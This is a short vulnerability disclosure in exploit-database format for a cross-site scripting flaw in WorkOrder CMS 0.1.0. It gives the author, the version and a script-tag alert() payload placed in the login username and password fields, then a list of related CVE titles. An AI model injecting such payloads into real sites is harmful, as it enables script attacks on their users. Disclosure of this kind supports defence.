WorkOrder CMS 0.1.0 Cross Site Scripting 

# Exploit Title: WorkOrder CMS 0.1.0 Cross-Site Scripting (XSS)

# Date: Sep 22, 2022

# Exploit Author: Chokri Hammedi

# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS

# Software Link:
https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip

# Version: 0.1.0

# Tested on: Linux

# Payload:

username:<u>test1337<script>alert(‘hi’);</script>

password:<u>test1337<script>alert(‘hi’);</script>

نوشته های مشابه

CVE-2026-6428 – Koha SQL Injection

CVE-2026-5513 – Online Scheduling and Appointment Booking System – Bookly

CVE-2026-11624 – Model Context Protocol DNS Rebinding Vulnerability

CVE-2026-1291 – Meow Gallery